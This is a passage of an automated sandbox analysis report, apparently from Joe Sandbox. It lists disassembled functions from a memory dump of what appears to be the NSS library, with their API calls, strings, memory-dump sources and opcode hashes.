                                                                                                                                                                                                                          Function 6C540C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
                                                                                                                                                                                                                          • Instruction ID: d25f0e901baf5ff052fb3f2ac6c73b6854e2bffe186b072f740d0dad83214ea4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cda95d6ea283ee4c9e137fe1ed44031aa8ab0ec70079be82106298fc116dd0f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C11BF75604345CFCB00DF28C88466AB7B1FF95368F24C46AD8198B701DB71E8068BA1
                                                                                                                                                                                                                          Function 6C4B3FF0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$Error
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2275178025-0
                                                                                                                                                                                                                          • Opcode ID: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
                                                                                                                                                                                                                          • Instruction ID: c891e00470e6123313c328551daa3705a8441217cb560e16859f234145f4028b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da28c0726b2ccbccd98010155c0125c32c9e807d7d43393f1c044887029a7ef5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F05E70A047998BCB10DF29C95159AB7F4EF49254F129619EC8AAB301EB70BAC4C7D1
                                                                                                                                                                                                                          Function 6C540D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                          • Instruction ID: 66205555311cee1b0cfca9708c5c25835345e99bc65d725c80bf8e87d57c4cfc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2E06D3A202054A7DF148E09C850AA97359DFD1719FB4C47ACC5A9BA01D633F8078B81
                                                                                                                                                                                                                          Function 6C46CC60 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
                                                                                                                                                                                                                          • Instruction ID: 125497e14dffb1c6e42affd9423d06053cedafd3d1ebd8773e18b965bd28bf74
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce921e347125e3643dbba53842544590a282e1556149b4fb4ef37e8064b9634a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10C04838244708CFC704DB08E8899A43BA8AB096107054094EA028B721EB21F840CA88
                                                                                                                                                                                                                          Function 6C4B9840 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
                                                                                                                                                                                                                          • Instruction ID: 47104a29f38758b626e9fd1b87f1f88c6e7dc0f92f2b434e0ef660784f2bd3ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25f1b04af2d414bc709eb0aa962eb82f9c46809ed6268de7c23cbda30ddf6cb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                          Function 6C4D5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C4D5E08
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5E3F
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C4D5E5C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5E7E
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5E97
                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C4D5EA5
                                                                                                                                                                                                                          • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C4D5EBB
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5ECB
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C4D5EF0
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5F12
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5F35
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C4D5F5B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5F82
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C4D5FA3
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C4D5FB7
                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D5FC4
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5FDB
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D5FE9
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D5FFE
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D600C
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D6027
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C4D605A
                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C5AAAF9,00000000), ref: 6C4D606A
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D607C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D609A
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D60B2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D60CE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                          • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                          • API String ID: 1427204090-154007103
                                                                                                                                                                                                                          • Opcode ID: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                          • Instruction ID: d7d0e43d949374730e3df7721b3848e3fdf1a0f9ee5eec15076dd9646009c8f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391F5F09042055BEB01FF659C95F9E3BA4DF06289F0A0468EC559BB42EB31F905C7A2
                                                                                                                                                                                                                          Function 6C461D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C461DA3
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C461DB2
                                                                                                                                                                                                                            • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                            • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                            • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                            • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C461DD8
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C461E4F
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C461EA4
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C461ECD
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C461EEF
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C461F17
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C461F34
                                                                                                                                                                                                                          • PR_SetLogBuffering.NSS3(00004000), ref: 6C461F61
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C461F6E
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C461F83
                                                                                                                                                                                                                          • PR_SetLogFile.NSS3(00000000), ref: 6C461FA2
                                                                                                                                                                                                                          • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C461FB8
                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C461FCB
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C461FD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                          • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                          • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                          • Opcode ID: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                          • Instruction ID: 9eac069976ad8792fbc366bb460cb33eefb76ab86b586f47e734d0bd0bf36c7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22517DB1E002599BDF00DBE6CC44F9E77B8AF05309F080529E816EBB49E771E918CB95
                                                                                                                                                                                                                          Function 6C546E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C40BE66), ref: 6C546E81
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C40BE66), ref: 6C546E98
                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,?,?,?,?,?,?,6C40BE66), ref: 6C546EC9
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C40BE66), ref: 6C546ED2
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C546EF8
                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F1F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F28
                                                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F3D
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C40BE66), ref: 6C546FA6
                                                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FDB
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FE4
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FEF
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547014
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C40BE66), ref: 6C54701D
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C547030
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C54705B
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C40BE66), ref: 6C547079
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547097
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C5470A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                          • String ID: PXl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                          • API String ID: 593473924-1839926694
                                                                                                                                                                                                                          • Opcode ID: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                          • Instruction ID: 1f6d9dd8d4a14d9bd13f1e76fdae3e36860dc56447b1169382f773de1766e511
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83518BB1A013116BE7109B309C51FBF36668F92358F148938E81596BC2FF25A91EC6D3
                                                                                                                                                                                                                          Function 6C4D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000,00000000,00000001), ref: 6C4D5009
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4D5049
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D505D
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C4D5071
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5089
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D50A1
                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D50B2
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2), ref: 6C4D50CB
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D50D9
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4D50F5
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5103
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D511D
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D512B
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5145
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5153
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D516D
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D517B
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5195
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
